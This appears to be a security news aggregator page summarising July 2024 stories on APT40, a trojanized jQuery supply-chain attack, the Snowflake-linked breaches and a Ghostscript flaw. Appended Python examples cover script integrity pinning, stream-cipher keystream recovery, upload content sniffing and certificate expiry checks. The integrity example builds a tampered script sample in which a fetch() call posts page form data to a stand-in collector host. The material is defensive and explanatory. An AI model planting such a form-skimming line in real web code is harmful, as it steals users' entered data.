Daily Brief
Find articles below, see 'DETAILS' for generated summaries
Total articles found: 11827
Checks for new stories every ~15 minutes
| Date | Source | Category | Title | Summary | Details |
|---|---|---|---|---|---|
| 2024-07-09 06:34:53 | theregister | MISCELLANEOUS | Microsoft China Switches to Apple Devices Over Android Issues | Microsoft China instructs employees to cease using Android devices due to login and authentication challenges.
The company opts for providing Apple devices to its staff, leveraging iOS's ability to host necessary authentication apps.
Google Mobile Services' unavailability in China cited as a key reason for the inability to use Android effectively in Microsoft's operations.
Microsoft avoids using local Android app stores or sideloading apps, possibly due to security concerns.
The decision reflects a broader reluctance from Microsoft to engage deeply with China's mobile ecosystem and local app market.
This shift comes amid broader tensions, including US accusations that China gained unauthorized access to US officials' email accounts.
Dropping Android in China is a small operational change with wider geopolitical and tech-industry implications. | Details |
| 2024-07-09 06:04:09 | theregister | CYBERCRIME | Scammers Target Victims with Fake Recovery Aid Schemes | The Australian Competition and Consumer Commission (ACCC) has issued a warning about scammers targeting previous scam victims with fraudulent recovery offers.
Scammers exploit databases containing details of previous scam victims, using this information to pose as trusted entities like government agencies or legal firms.
Victims are approached with offers to recover their lost funds for an upfront fee, a percentage of the recovered amount, or a purported tax.
Personal information and remote access to devices are often requested under the guise of verifying identity or setting up digital wallets for cryptocurrency recovery.
People over the age of 65 are particularly vulnerable to these scams, with reported losses totaling AU$2.9 million, not including unreported incidents.
Tactics include fake testimonials, social media advertisements, and the creation of authentic-looking websites to lure victims.
The ACCC emphasizes the difficulty of recovering money as scammers typically move funds offshore quickly.
A mandatory code for banks and telecoms is under development in Australia to detect, prevent, and possibly compensate for such scams. | Details |
| 2024-07-09 05:58:46 | thehackernews | NATION STATE ACTIVITY | Global Cybersecurity Alert on China's APT40 Exploitation Tactics | A multinational cybersecurity advisory warns about the China-linked espionage group, APT40, which rapidly exploits vulnerabilities in widely used software.
APT40, active since at least 2013, has a history of cyber-attacks primarily in the Asia-Pacific, and is assessed to be part of China's Ministry of State Security.
The group adapts quickly to exploit newly disclosed security flaws, including major vulnerabilities in Log4j, Atlassian Confluence, and Microsoft Exchange.
Noteworthy techniques include web shells for persistence, compromised end-of-life or unpatched small office/home office (SOHO) devices co-opted as operational infrastructure to proxy traffic and blend in with legitimate activity, and Australian websites leveraged for command and control.
The group conducts thorough reconnaissance of target networks and prefers exploiting exposed, unpatched or end-of-life infrastructure over techniques that need user interaction, which lets it act on a newly disclosed flaw within hours or days.
Mitigation recommendations include comprehensive logging, multi-factor authentication, a robust patch management strategy, and network segmentation to shield sensitive data from unauthorized access. | Details |
| 2024-07-09 04:52:23 | thehackernews | MALWARE | Trojanized jQuery Libraries Compromise Multiple High-Profile Repositories | Unknown threat actors have implemented a supply chain attack by distributing trojanized versions of jQuery on npm, GitHub, and jsDelivr.
Phylum's analysis highlights the subtlety of the attack: the malicious code was spliced into jQuery's rarely used 'end' function, where casual review is unlikely to notice it.
A total of 68 malicious packages, named creatively to resemble legitimate ones, were introduced onto the npm registry from May 26 to June 23, 2024.
The attackers manually assembled and published these packages, indicated by diverse naming conventions and inconsistent publishing time frames.
Phylum discovered that the compromised 'end' function is designed to steal data entered in website forms and send it to a hacker-controlled remote URL.
The trojanized jQuery has been found in a GitHub repository under the user "indexsc," which also hosts additional JavaScript files that utilize the malicious library.
jsDelivr serves files straight from any public GitHub repository under its cdn.jsdelivr.net/gh/ path, and the attackers are thought to have used this to give the malware a CDN URL that looks more legitimate and passes more easily through security controls.
This event coincides with similar malicious activities detected on the Python Package Index (PyPI), which involve downloading malware based on the system's CPU architecture. | Details |
| 2024-07-09 02:34:35 | theregister | NATION STATE ACTIVITY | Global Alert on China's APT40 Rapid Exploitation of New Vulnerabilities | Cybersecurity agencies from Australia, the US, the UK and partner nations have issued a joint advisory on China's state-sponsored APT40.
APT40, linked directly to China's Ministry of State Security, can develop and deploy exploits within hours of vulnerabilities being disclosed.
The advisory details APT40’s focus on exploiting end-of-life or unpatched systems in their cyber operations.
The group uses initial access through compromised devices, often in small businesses or home setups, to deploy further attacks.
Techniques used by APT40 include leveraging web shells, searching for valid user credentials, and installing malware for data exfiltration.
Highlighted vulnerabilities targeted by APT40 include flaws in Log4j, Atlassian Confluence, and Microsoft Exchange.
Recommended mitigation strategies include regular patching, network segmentation, use of multifactor authentication, and disabling unused network services.
The advisory stresses the rapid adaptation and operational speed of APT40, posing significant security challenges to vulnerable networks internationally. | Details |
| 2024-07-08 22:04:41 | bleepingcomputer | DATA BREACH | Zotac Accidentally Exposes Customer RMA Data on Google Search | Zotac inadvertently made customer return merchandise authorization (RMA) data accessible online due to a misconfiguration of their web folders.
The exposed data included sensitive details such as customer names, addresses, contact information, and invoice specifics.
The exposure stemmed from inadequate access permissions on the web folders; with no robots.txt excluding them, Google indexed the documents. A robots.txt file only asks well-behaved crawlers not to index content; it is not an access control, and the files remained reachable to anyone with the URL until the permissions were fixed.
The issue was highlighted by a viewer of the GamersNexus YouTube tech channel, ultimately prompting an investigation into the data exposure.
Zotac and GamersNexus have taken steps to notify affected partners and have started securing the exposed data, although some information may still be retrievable via Google Search.
To mitigate further risk, Zotac disabled the document upload function on their RMA portal, requesting customers to instead email necessary documents.
Customers who have used Zotac's RMA service should assume their personal information may have been exposed and take appropriate precautions. | Details |
| 2024-07-08 21:44:09 | bleepingcomputer | DATA BREACH | Hackers Leak Thousands of Ticketmaster Print-at-Home Tickets | Hackers known as 'Sp1derHunters' released almost 39,000 print-at-home Ticketmaster tickets for upcoming concerts including major artists like Pearl Jam and Foo Fighters.
The tickets came from the theft of Ticketmaster's data at Snowflake, one of roughly 165 customer environments accessed with credentials harvested by information-stealing malware from accounts that had no multi-factor authentication.
Ticketmaster was extorted for up to $2 million to prevent further leaks; it argued that its SafeTix mobile tickets rotate their barcodes frequently, so leaked barcode data would be useless.
Despite Ticketmaster's claims, Sp1derHunters pointed out that the barcodes for print-at-home tickets cannot be refreshed, thus challenging Ticketmaster's security measures.
The leaked data includes detailed information needed to create valid tickets, raising concerns over potential fraudulent entry into events.
The incident highlights ongoing vulnerabilities in digital ticketing processes and challenges in securing large databases, potentially affecting customer trust and corporate reputation.
Response from Ticketmaster regarding future actions for the affected tickets remains unconfirmed. | Details |
| 2024-07-08 20:42:53 | bleepingcomputer | DATA BREACH | Neiman Marcus Breach Exposes Over 31 Million Email Addresses | Neiman Marcus experienced a significant data breach in May 2024, with more than 31 million customer email addresses exposed.
Data security expert Troy Hunt confirmed the authenticity of the exposed data, which includes names, contact info, transaction data, and sensitive financial and personal data.
Initially, Neiman Marcus reported to the Maine Attorney General that only 64,472 were affected, but further analysis revealed millions affected.
The breach was part of the wider Snowflake data-theft campaign, in which attackers logged into customer accounts protected by a password alone, with no multi-factor authentication.
Data put up for sale included millions of gift card numbers and detailed transaction records; the attackers initially demanded a ransom.
A joint investigation by Snowflake, Mandiant, and CrowdStrike attributed the campaign to the financially motivated threat actor UNC5537, which used stolen credentials rather than any vulnerability in the Snowflake platform. | Details |
| 2024-07-08 18:55:24 | bleepingcomputer | MALWARE | Avast Unveils Free Decryptor for DoNex Ransomware Variants | Avast has identified a cryptographic vulnerability in the DoNex ransomware family, enabling the creation of a free file decryptor.
This tool counters several variants of DoNex, previously known as DarkRace and Muse, which earlier masqueraded under the Lockbit 3.0 name.
The decryptor has been discreetly provided to affected entities in collaboration with law enforcement since March 2024 to avoid alerting cybercriminals.
Following the public revelation of the cryptographic flaw at the Recon 2024 conference, Avast released the decryptor tool publicly.
DoNex's recent activities primarily targeted the United States, Italy, and Belgium but maintained a global presence.
The ransomware encrypts file contents with the ChaCha20 stream cipher; a flaw in how DoNex applies it lets Avast recover files without the ransom.
Avast recommends the 64-bit build, run with administrator rights; the tool needs one pair of files, an encrypted file and its unencrypted original, before it can recover the rest.
Caution is advised to back up encrypted files before decryption to prevent potential data loss. | Details |
| 2024-07-08 16:27:25 | bleepingcomputer | MALWARE | Critical RCE Vulnerability in Ghostscript Exploited in Recent Attacks | A remote code execution (RCE) vulnerability in Ghostscript is actively being exploited, affecting many Linux-based systems.
Ghostscript underpins document conversion in tools such as ImageMagick, LibreOffice, and CUPS, and ships by default on many Linux distributions.
Identified as CVE-2024-29510, the flaw is a format string bug that lets a crafted document escape the -dSAFER sandbox and perform command execution and file operations it should not be able to.
Attackers deliver malicious EPS files renamed with a .jpg extension; any service that picks a converter by extension rather than by the file's actual content will hand the file to Ghostscript, giving the attacker shell access.
Despite a patch being available since May, many systems remain vulnerable; updating to Ghostscript v10.03.1 or applying vendor-supplied patches is critical.
The vulnerability's exploitation poses a significant risk to web applications and other services that incorporate document conversion features using Ghostscript.
Security professionals can use a provided Postscript file to check system vulnerability to these specific attacks. | Details |
| 2024-07-08 15:46:29 | thehackernews | NATION STATE ACTIVITY | New APT "CloudSorcerer" Targets Russian Govt via Cloud Services | CloudSorcerer, an APT group, primarily targets Russian government entities using cloud-based command-and-control.
This newly identified cyber espionage campaign leverages services like Microsoft Graph, Yandex Cloud, and Dropbox for stealth monitoring and data exfiltration.
Kaspersky discovered these cyberattacks in May 2024, noting the innovative use of malware with features similar yet distinct from the earlier known CloudWizard.
The malware employs various evasion tactics, adjusting its behavior dynamically based on its host process to avoid detection.
Initial intrusion techniques remain unclear, but post-access strategies include utilizing a C-based executable for backdoor access, data collection, and further malicious activities.
CloudSorcerer makes initial contact with C2 servers via GitHub, using it as a dead drop resolver before moving to more direct cloud service communications.
Its use of Windows pipes for communication between its components is a further sign of a capable actor focused on slipping past common defenses. | Details |
| 2024-07-08 15:15:28 | bleepingcomputer | NATION STATE ACTIVITY | CloudSorcerer APT Utilizes Clouds to Target Russian Government | The group named CloudSorcerer executes cyberespionage against Russian government entities by exploiting public cloud services.
Discovered by Kaspersky in May 2024, this advanced persistent threat (APT) employs custom malware leveraging legitimate cloud platforms for control and data storage.
The unique malware uses different tactics depending on the host application, such as "mspaint.exe" or "msiexec.exe," to manage command and control (C2) communications or execute malicious activities.
Initial contact by the malware is through a GitHub repository, which facilitates further C2 operations through various cloud services like Microsoft Graph, Yandex Cloud, or Dropbox.
The malware ensures stealth and efficacy by using Windows pipes for inter-process communications, adapting to the specific environment of the infected machine.
CloudSorcerer can conduct extensive reconnaissance on the infected system, gathering data like computer name, username, and system details.
Kaspersky emphasizes the sophistication of the attacks due to the malware's ability to dynamically adapt and obfuscate data transmission.
Detection signatures and methods (IoCs and Yara rules) have been made available by Kaspersky for identifying and mitigating CloudSorcerer threats. | Details |
| 2024-07-08 15:10:02 | thehackernews | MALWARE | Malware Exposes Users of Dark Web Child Abuse Sites | Recorded Future's analysis revealed 3,300 users linked to child sexual abuse material (CSAM) sites through malware logs published on the dark web.
Approximately 4.2% of these users had credentials for multiple CSAM sources, highlighting extensive criminal behavior.
Malware variants such as Kematian Stealer, Neptune Stealer, and others increasingly target sensitive information like credentials and payment data, often ending up for sale on the dark web.
The malware distribution channels include phishing, spam, cracked software, fake updates, SEO poisoning, and malvertising.
The investigation utilized stolen credentials to identify and unmask individuals accessing known CSAM domains, leading to the identification of three major offenders.
Recorded Future noted significant user counts from countries like Brazil, India, and the U.S., attributing high figures possibly to dataset sourcing biases.
Insights from malware logs are shared with law enforcement to aid in tracking and investigating dark web child exploitation networks. | Details |
| 2024-07-08 14:13:31 | theregister | MISCELLANEOUS | Microsoft Neglects SwiftKey's Support Site Certificate Renewal | Microsoft SwiftKey's support site certificate expired on June 10, leading to security warnings for users.
SwiftKey, a predictive keyboard app bought by Microsoft in 2016, still has a significant user base despite competing improvements by Apple and Google.
Browsers showed certificate warnings that flagged the site as insecure, deterring users from reaching support content.
The recent attempt to rebrand SwiftKey with "Copilot" features in February highlights ongoing development, despite this oversight.
Microsoft's history of certificate management issues is noted, with similar problems occurring recently with Microsoft 365.
Microsoft did not include a solution for the expired certificate in the most recent update on June 14, focused only on general improvements.
The lapse in certificate renewal has raised questions regarding Microsoft's commitment to maintaining support infrastructure for its products. | Details |
| 2024-07-08 13:57:59 | bleepingcomputer | DATA BREACH | Roblox Developer Conference Attendee Data Compromised in Vendor Breach | Roblox reported a data breach affecting attendees of its Developer Conferences spanning 2022 to 2024.
The breach originated from FNTech, a third-party vendor responsible for conference registration, where unauthorized access to data was gained.
Exposed data includes full names, email addresses, and IP addresses of conference participants.
The Have I Been Pwned database has verified and added 10,386 affected email addresses, 63% of which were not previously compromised.
A separate leak in 2023 exposed nearly 4,000 Roblox developer accounts, data taken in a 2021 incident, underscoring ongoing security challenges.
The exposed fields are not themselves sensitive, but names paired with email addresses make targeted phishing against developers more convincing.
Roblox assures enhancements in their security protocols to prevent such occurrences in the future. | Details |
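The trojanized-jQuery entry above turns on a script being swapped on a CDN path that looks trustworthy. The check a practitioner wants against that is Subresource Integrity: pin the hash of the file you reviewed, and let the browser refuse anything else. The following is an added example, not code from Phylum, jQuery or jsDelivr; the script bodies, the HTML snippet and the cdn.jsdelivr.net/gh/someuser/somerepo URL are constructed for illustration.

```python
"""Subresource Integrity (SRI) pinning and verification for a served script.

Added example for the trojanized-jQuery entry; not Phylum's or jQuery's code.
Sample script bodies, the HTML snippet and the jsDelivr URL are constructed.
"""
import base64
import hashlib
import re

SRI_ALGOS = ("sha256", "sha384", "sha512")

# Constructed stand-in for a clean library file as shipped by its maintainers.
CLEAN_JS = (b"/*! demo-lib */ (function(){ window.lib = { end: function(){ "
            b"return this; } }; })();")

# Constructed stand-in for the same file with an exfiltration hook grafted into
# the rarely called end() method, in the spirit of the attack described.
TAMPERED_JS = CLEAN_JS.replace(
    b"return this;",
    b"fetch('https://collector.invalid/', {method: 'POST', "
    b"body: new FormData(document.forms[0])}); return this;",
)

# Constructed HTML: one script pinned with integrity=, one pulled from a GitHub
# repository through jsDelivr with no pin at all, one inline script.
SAMPLE_HTML = """
<script src="/static/demo-lib.js" integrity="PLACEHOLDER" crossorigin="anonymous"></script>
<script src="https://cdn.jsdelivr.net/gh/someuser/somerepo@main/jquery.min.js"></script>
<script>console.log('inline, no src');</script>
"""


def sri_hash(data: bytes, algo: str = "sha384") -> str:
    """Return the '<algo>-<base64 digest>' token a browser expects in integrity=."""
    if algo not in SRI_ALGOS:
        raise ValueError(f"SRI permits only {SRI_ALGOS}, got {algo!r}")
    digest = hashlib.new(algo, data).digest()
    return f"{algo}-{base64.b64encode(digest).decode('ascii')}"


def verify_sri(data: bytes, integrity: str) -> bool:
    """Apply the browser rule: of all tokens in the attribute, only those using
    the strongest listed algorithm count, and any one of them matching passes.
    Unknown algorithms and malformed tokens are ignored, as browsers do; with
    no usable token this helper fails closed (browsers would load the file)."""
    accepted: dict[str, set[str]] = {}
    for token in integrity.split():
        algo, sep, rest = token.partition("-")
        if sep and algo in SRI_ALGOS:
            accepted.setdefault(algo, set()).add(rest.split("?", 1)[0])  # drop options
    if not accepted:
        return False
    strongest = max(accepted, key=lambda a: int(a[3:]))
    actual = sri_hash(data, strongest).split("-", 1)[1]
    return actual in accepted[strongest]


SCRIPT_TAG = re.compile(r"<script\b([^>]*)>", re.IGNORECASE)
ATTR = re.compile(r"""(\w+)\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s>]+))""")


def scripts_missing_integrity(html: str) -> list[str]:
    """List src URLs of external <script> tags that carry no integrity attribute."""
    missing = []
    for m in SCRIPT_TAG.finditer(html):
        attrs = {k.lower(): (v1 or v2 or v3) for k, v1, v2, v3 in ATTR.findall(m.group(1))}
        if "src" in attrs and not attrs.get("integrity"):
            missing.append(attrs["src"])
    return missing


if __name__ == "__main__":
    pin = sri_hash(CLEAN_JS)
    print("pin for the reviewed file:", pin)
    print("clean file passes:   ", verify_sri(CLEAN_JS, pin))
    print("tampered file passes:", verify_sri(TAMPERED_JS, pin))
    print("unpinned scripts:", scripts_missing_integrity(SAMPLE_HTML))
```

Pin the hash of the copy you actually reviewed, add `crossorigin="anonymous"` for cross-origin CDNs, and treat any script tag that `scripts_missing_integrity` reports as a review finding: a version-tagged jsDelivr URL names a Git ref, not a fixed set of bytes.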
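The DoNex decryptor entry above says the tool needs one pair of files, an encrypted file and its original, before it can recover the rest. The page does not describe the flaw Avast found, and this added example does not claim to; it shows the generic weakness class with that signature, keystream recovery against a stream cipher whose key and nonce are reused across files. It is not Avast's or DoNex's code: the keystream generator is a SHA-256 counter-mode stand-in rather than ChaCha20, and the key, nonces and "victim files" are constructed.

```python
"""Known-plaintext keystream recovery against a stream cipher that reuses its
key and nonce across files.

Added example for the DoNex decryptor entry.  The keystream generator is a
SHA-256 counter-mode stand-in, not ChaCha20 and not DoNex's scheme; the key,
nonces and file contents are constructed.
"""
import hashlib

KEY = bytes(range(32))          # constructed 256-bit key
NONCE_A = b"\x00" * 12          # constructed nonce
NONCE_B = b"\x01" * 12          # a second, distinct nonce

# Constructed files: a document the analyst can obtain in clear (a public
# template, an installer, a stock image) and a private document to recover.
KNOWN_PLAINTEXT = b"Standard Terms and Conditions v3 - public template " + b"." * 40
SECRET_DOCUMENT = b"Wire USD 250,000 to account 000-111 before Friday. Signed, CFO"


def keystream(key: bytes, nonce: bytes, length: int) -> bytes:
    """Stand-in keystream: concatenated SHA-256(key || nonce || counter) blocks.
    Like a real stream cipher, the stream depends only on (key, nonce, position)."""
    out = bytearray()
    counter = 0
    while len(out) < length:
        out += hashlib.sha256(key + nonce + counter.to_bytes(8, "little")).digest()
        counter += 1
    return bytes(out[:length])


def xor_bytes(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))


def encrypt(key: bytes, nonce: bytes, plaintext: bytes) -> bytes:
    """Stream-cipher encryption is plaintext XOR keystream; decryption is the same."""
    return xor_bytes(plaintext, keystream(key, nonce, len(plaintext)))


def recover_keystream(original: bytes, encrypted: bytes) -> bytes:
    """C = P xor K, so K = P xor C.  One known pair yields len(original) bytes of
    keystream without any knowledge of the key."""
    if len(original) != len(encrypted):
        raise ValueError("stream ciphers preserve length; this pair does not match")
    return xor_bytes(original, encrypted)


def decrypt_with_keystream(ks: bytes, encrypted: bytes) -> bytes:
    """Decrypt another ciphertext with the recovered keystream.  Only the prefix
    covered by the known pair is recoverable; longer files need a longer pair."""
    if len(encrypted) > len(ks):
        raise ValueError(f"recovered keystream covers {len(ks)} bytes, file is {len(encrypted)}")
    return xor_bytes(encrypted, ks)


def attack(reuse_nonce: bool) -> bool:
    """Simulate the ransomware encrypting two files, then recover the second from a
    known copy of the first.  Succeeds only when (key, nonce) was reused."""
    c_known = encrypt(KEY, NONCE_A, KNOWN_PLAINTEXT)
    c_secret = encrypt(KEY, NONCE_A if reuse_nonce else NONCE_B, SECRET_DOCUMENT)
    ks = recover_keystream(KNOWN_PLAINTEXT, c_known)
    return decrypt_with_keystream(ks, c_secret) == SECRET_DOCUMENT


if __name__ == "__main__":
    print("same key and nonce for every file -> recovered:", attack(True))
    print("fresh nonce per file              -> recovered:", attack(False))
```

This is also why the advice to back up encrypted files before running any decryptor matters: a recovered keystream that is a byte too short, or taken from the wrong pair, silently corrupts the output instead of failing.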
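The Ghostscript entry above describes EPS files arriving under a .jpg name, and a patch that many systems have not applied. The two checks a practitioner wants are a content sniff that ignores the uploader's extension, and a version gate that knows its own limits. The following is an added example, not code from Ghostscript, Codean Labs or BleepingComputer; the sample byte strings and file names are constructed, and the magic values are the standard JPEG SOI marker, the `%!PS` header comment and the DOS EPS binary wrapper signature.

```python
"""Content sniffing for PostScript/EPS uploads that claim to be JPEG, plus a
Ghostscript version gate for CVE-2024-29510.

Added example for the Ghostscript entry; not Ghostscript's or the researchers'
code.  Sample files and names are constructed.
"""
import re
import subprocess
from pathlib import PurePosixPath

JPEG_MAGIC = b"\xff\xd8\xff"          # SOI marker plus the first byte of the next marker
PS_MAGIC = b"%!PS"                    # PostScript / EPS header comment
DOS_EPS_MAGIC = b"\xc5\xd0\xd3\xc6"   # DOS EPS binary preview wrapper
FIXED_VERSION = (10, 3, 1)            # Ghostscript 10.03.1 closes CVE-2024-29510
RASTER_EXTENSIONS = {".jpg", ".jpeg"}

# Constructed samples: a minimal JPEG header, a harmless EPS program, a DOS EPS
# wrapper, a plain EPS with an honest name, and a text file.
SAMPLES = {
    "photo.jpg": JPEG_MAGIC + b"\xe0\x00\x10JFIF\x00\x01\x01\x00",
    "invoice.jpg": b"%!PS-Adobe-3.0 EPSF-3.0\n%%BoundingBox: 0 0 10 10\nshowpage\n",
    "logo.jpeg": DOS_EPS_MAGIC + b"\x1e\x00\x00\x00" + b"\x00" * 26 + b"%!PS-Adobe-3.0 EPSF-3.0\n",
    "figure.eps": b"%!PS-Adobe-3.0 EPSF-3.0\n",
    "notes.txt": b"just text\n",
}


def sniff(data: bytes) -> str:
    """Classify by leading bytes, ignoring whatever name the uploader chose."""
    if data.startswith(JPEG_MAGIC):
        return "jpeg"
    if data.startswith(DOS_EPS_MAGIC):
        return "dos-eps"
    if data.lstrip(b" \t\r\n").startswith(PS_MAGIC):
        return "postscript"
    # Ghostscript does not require the %!PS comment, so "unknown" must never be
    # routed to a PostScript-capable converter on the strength of its extension.
    return "unknown"


def upload_verdict(name: str, data: bytes) -> str:
    """Accept only content whose sniffed type matches an allowed raster extension."""
    kind = sniff(data)
    ext = PurePosixPath(name).suffix.lower()
    if kind in ("postscript", "dos-eps"):
        return "reject-disguised-postscript" if ext in RASTER_EXTENSIONS else "reject-postscript"
    if kind == "jpeg":
        return "accept" if ext in RASTER_EXTENSIONS else "reject-mismatch"
    return "reject-unknown"


def parse_gs_version(text: str) -> tuple:
    """Parse 'gs --version' output ('10.03.1') or a banner line such as
    'GPL Ghostscript 10.02.1 (2023-11-01)'."""
    m = re.search(r"\b(\d+)\.(\d+)\.(\d+)\b", text)
    if not m:
        raise ValueError(f"no version number in {text!r}")
    return tuple(int(x) for x in m.groups())


def version_vulnerable(text: str) -> bool:
    """True when the reported version predates the fix.  A version at or above
    10.03.1 is fixed; a lower number means 'possibly vulnerable', because
    distributions backport the patch without bumping the version string.  In that
    case confirm with the vendor advisory or the researchers' test PostScript file."""
    return parse_gs_version(text) < FIXED_VERSION


def installed_gs_version() -> str:
    """Run the local gs binary; not exercised offline."""
    return subprocess.run(["gs", "--version"], capture_output=True, text=True, check=True).stdout


if __name__ == "__main__":
    for name, data in SAMPLES.items():
        print(f"{name:12s} sniffed={sniff(data):11s} verdict={upload_verdict(name, data)}")
    try:
        v = installed_gs_version()
        print("gs", v.strip(), "possibly vulnerable" if version_vulnerable(v) else "fixed")
    except (FileNotFoundError, subprocess.CalledProcessError):
        print("gs not found on PATH")
```

Run the sniff before any conversion library sees the upload; ImageMagick's own delegate dispatch also uses magic bytes, but services that choose a converter from the extension or a client-supplied Content-Type are exactly the ones this campaign targets.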
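The SwiftKey support-site entry above is a plain expiry lapse, and the fix is a monitor that warns before the date rather than a user noticing afterwards. The following is an added example, not Microsoft's tooling: it classifies certificates by days remaining using the record shape Python's `ssl` module returns from `getpeercert()`. The three certificate records and the fixed "now" of 2024-07-08 are constructed so the output is reproducible; only their field layout mirrors the real API.

```python
"""Certificate expiry monitor on the dict shape returned by ssl getpeercert().

Added example for the SwiftKey support-site entry; not Microsoft's tooling.
The certificate records and FIXED_NOW are constructed.
"""
import socket
import ssl
import time

WARN_DAYS = 30  # assumption: renewal is due within 30 days of expiry

# Constructed records in getpeercert() layout.
SAMPLE_CERTS = [
    {"subject": ((("commonName", "support.example.invalid"),),),
     "subjectAltName": (("DNS", "support.example.invalid"),),
     "notAfter": "Jun 10 23:59:59 2024 GMT"},
    {"subject": ((("commonName", "www.example.invalid"),),),
     "subjectAltName": (("DNS", "www.example.invalid"),),
     "notAfter": "Aug 01 12:00:00 2024 GMT"},
    {"subject": ((("commonName", "api.example.invalid"),),),
     "subjectAltName": (("DNS", "api.example.invalid"),),
     "notAfter": "Dec 31 23:59:59 2024 GMT"},
]
# Constructed clock: 2024-07-08 00:00:00 UTC, parsed with the same helper.
FIXED_NOW = ssl.cert_time_to_seconds("Jul 08 00:00:00 2024 GMT")


def common_name(cert: dict) -> str:
    for rdn in cert.get("subject", ()):
        for key, value in rdn:
            if key == "commonName":
                return value
    return "<no CN>"


def days_remaining(cert: dict, now: float) -> float:
    """Days until notAfter; negative once expired.  ssl.cert_time_to_seconds
    parses the 'Mon DD HH:MM:SS YYYY GMT' form as UTC seconds since the epoch."""
    return (ssl.cert_time_to_seconds(cert["notAfter"]) - now) / 86400


def classify(cert: dict, now: float, warn_days: int = WARN_DAYS) -> str:
    d = days_remaining(cert, now)
    if d < 0:
        return "expired"
    if d <= warn_days:
        return "expiring"
    return "ok"


def report(certs: list, now: float, warn_days: int = WARN_DAYS) -> dict:
    """Map common name -> status for a batch of certificates."""
    return {common_name(c): classify(c, now, warn_days) for c in certs}


def fetch_cert(host: str, port: int = 443, timeout: float = 5.0) -> dict:
    """Live check, not exercised offline.  The default context refuses an expired
    leaf during the handshake, and with verification disabled getpeercert()
    returns no fields, so an already-expired certificate surfaces as
    ssl.SSLCertVerificationError rather than as a dict with a past notAfter."""
    ctx = ssl.create_default_context()
    with socket.create_connection((host, port), timeout=timeout) as sock:
        with ctx.wrap_socket(sock, server_hostname=host) as tls:
            return tls.getpeercert()


if __name__ == "__main__":
    import sys
    for cn, status in report(SAMPLE_CERTS, FIXED_NOW).items():
        print(f"{status:9s} {cn}")
    for host in sys.argv[1:]:
        try:
            print("live:", host, classify(fetch_cert(host), time.time()))
        except ssl.SSLCertVerificationError as e:
            print("live:", host, "verification failed:", e.verify_message)
```

Run it from a scheduler against the list of hostnames you own; the warning threshold is the important number, since an expiry monitor that only reports "expired" tells you what users already see in their browser.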